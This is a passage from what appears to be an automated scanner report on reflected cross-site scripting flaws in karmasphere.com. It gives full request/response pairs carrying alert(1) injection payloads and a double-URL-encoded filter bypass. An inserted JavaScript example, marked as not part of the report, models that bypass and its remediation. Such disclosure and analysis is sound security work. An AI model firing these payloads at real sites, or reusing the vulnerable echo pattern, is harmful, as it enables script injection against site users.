This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Products-Information/karmasphere-analyst.html?19636'%3balert(1)//83cc3c5973a=1 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 02:57:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 02:57:06 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <19636';alert(1)//83cc3c5973a=1&title=Big Data Analytics for Business Professionals | Karmasphere&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa9f5'%3balert(1)//e1726f0480d was submitted in the REST URL parameter 1. This input was echoed as aa9f5';alert(1)//e1726f0480d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Products-Informationaa9f5'%3balert(1)//e1726f0480d/overview.html HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:00:45 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:00:46 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Products-Informationaa9f5';alert(1)//e1726f0480d/overview.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 451a1'%3balert(1)//79e81dceac was submitted in the REST URL parameter 2. This input was echoed as 451a1';alert(1)//79e81dceac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Products-Information/451a1'%3balert(1)//79e81dceac HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:01:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:01:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Products-Information/451a1';alert(1)//79e81dceac&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.56. http://karmasphere.com/Products-Information/overview.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://karmasphere.com
Path: /Products-Information/overview.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54547'%3balert(1)//a20b0dd2987 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54547';alert(1)//a20b0dd2987 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Products-Information/overview.html?54547'%3balert(1)//a20b0dd2987=1 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 02:59:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 02:59:44 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33437
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <54547';alert(1)//a20b0dd2987=1&title=Big Data Intelligence Made Easy Using the Power of Apache Hadoop&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckg ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49111'%3balert(1)//1ee4cbe38e9 was submitted in the REST URL parameter 1. This input was echoed as 49111';alert(1)//1ee4cbe38e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Resource-Center49111'%3balert(1)//1ee4cbe38e9/resource-center-index.html HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:02:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:02:43 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Resource-Center49111';alert(1)//1ee4cbe38e9/resource-center-index.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weitervera ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9877d'%3balert(1)//b0e98dcb2fa was submitted in the REST URL parameter 2. This input was echoed as 9877d';alert(1)//b0e98dcb2fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Resource-Center/9877d'%3balert(1)//b0e98dcb2fa HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:03:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:03:38 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Resource-Center/9877d';alert(1)//b0e98dcb2fa&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.59. http://karmasphere.com/Resource-Center/resource-center-index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://karmasphere.com
Path: /Resource-Center/resource-center-index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a591d'%3balert(1)//152def7f262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a591d';alert(1)//152def7f262 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Resource-Center/resource-center-index.html?a591d'%3balert(1)//152def7f262=1 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 03:02:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:02:01 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31492
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <a591d';alert(1)//152def7f262=1&title=Big Data Intelligence from Karmasphere | Resource Center&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, da ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2906d'%3balert(1)//e67629a9c92 was submitted in the REST URL parameter 1. This input was echoed as 2906d';alert(1)//e67629a9c92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Table2906d'%3balert(1)//e67629a9c92/Press-Releases/ HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:02:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:02:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Table2906d';alert(1)//e67629a9c92/Press-Releases/&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wir ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1b06'%3balert(1)//c0a03236de3 was submitted in the REST URL parameter 2. This input was echoed as c1b06';alert(1)//c0a03236de3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Table/Press-Releasesc1b06'%3balert(1)//c0a03236de3/ HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 03:03:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:03:50 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Table/Press-Releasesc1b06';alert(1)//c0a03236de3/&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tr ...[SNIP]...
3.62. http://karmasphere.com/Table/Press-Releases/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://karmasphere.com
Path: /Table/Press-Releases/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3288d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc97bbbe545 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3288d"><script>alert(1)</script>cc97bbbe545 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Table/Press-Releases/?3288d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc97bbbe545=1 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 03:02:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:02:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34551
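The double-encoding bypass in 3.62 works because the filter runs on the value the web server has already decoded once, and the application then decodes it a second time before writing it into a double-quoted attribute. The block below is an added example, not code from the report or from the site it describes; the pipeline it models is a hypothetical reconstruction and the function names are this example's own. It shows the bypass against a validate-then-decode-again pipeline, the remediation the report recommends (decode once, validate on the canonical form, then encode for the attribute context), and a small check for whether the rendered attribute terminates early:

```javascript
// Added example (not the report's or the site's code). Models a query-parameter
// name reflected into a double-quoted HTML attribute.

// The web server percent-decodes the query string once before the application sees it.
// decodeURIComponent throws a URIError on malformed sequences such as "%zz"; a real
// handler should treat that as a rejected request rather than fall back to the raw bytes.
function serverDecodeOnce(rawQueryName) {
  return decodeURIComponent(rawQueryName);
}

// Character denylist of the kind the report describes: it catches '<', '>' and '"'
// when they arrive single-encoded, because by then they are literal characters.
function blockedByDenylist(value) {
  return /[<>"]/.test(value);
}

// Vulnerable pipeline (hypothetical reconstruction): validate, THEN decode a second
// time, THEN concatenate. The second decode turns %22 / %3c back into " / <.
function renderAttrVulnerable(rawQueryName) {
  const once = serverDecodeOnce(rawQueryName);
  if (blockedByDenylist(once)) return null;      // request rejected
  const twice = decodeURIComponent(once);        // the extra decode the remediation warns against
  return '<a href="/Table/Press-Releases/?' + twice + '=1">';
}

// Output encoder for the HTML attribute context.
function htmlAttrEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, function (ch) { return map[ch]; });
}

// Hardened pipeline: no second decode; validation runs on the canonical (once-decoded)
// form; output encoding is applied regardless of whether the denylist is kept.
function renderAttrHardened(rawQueryName, useDenylist) {
  if (useDenylist === undefined) useDenylist = true;
  const once = serverDecodeOnce(rawQueryName);
  if (useDenylist && blockedByDenylist(once)) return null;
  return '<a href="/Table/Press-Releases/?' + htmlAttrEncode(once) + '=1">';
}

// Does the href attribute close before the intended '">' (i.e. did the value break out)?
function attributeBrokenOut(html) {
  const m = html.match(/href="([^"]*)"(.*)$/);
  return m ? m[2] !== ">" : false;
}

// The report's double-encoded payload, reproduced here as constructed test input.
const doubleEncodedPayload = "3288d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc97bbbe545";

console.log("vulnerable:", renderAttrVulnerable(doubleEncodedPayload));
console.log("broken out:", attributeBrokenOut(renderAttrVulnerable(doubleEncodedPayload)));
console.log("hardened:  ", renderAttrHardened(doubleEncodedPayload));
console.log("encoder alone on a raw quote:", renderAttrHardened("x%22", false));
```

Note that the denylist is not what makes the hardened version safe: with the denylist disabled, a once-decoded quote is still rendered as `&quot;` and the attribute stays intact. The denylist only matters as an early reject, and it only works if it runs after canonicalisation and no further decoding happens on the way to the output.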
3.63. http://karmasphere.com/Table/Press-Releases/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://karmasphere.com
Path: /Table/Press-Releases/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9709c'%3balert(1)//fef8edcf38a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9709c';alert(1)//fef8edcf38a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Table/Press-Releases/?9709c'%3balert(1)//fef8edcf38a=1 HTTP/1.1
Host: karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 03:02:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 03:02:21 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34384
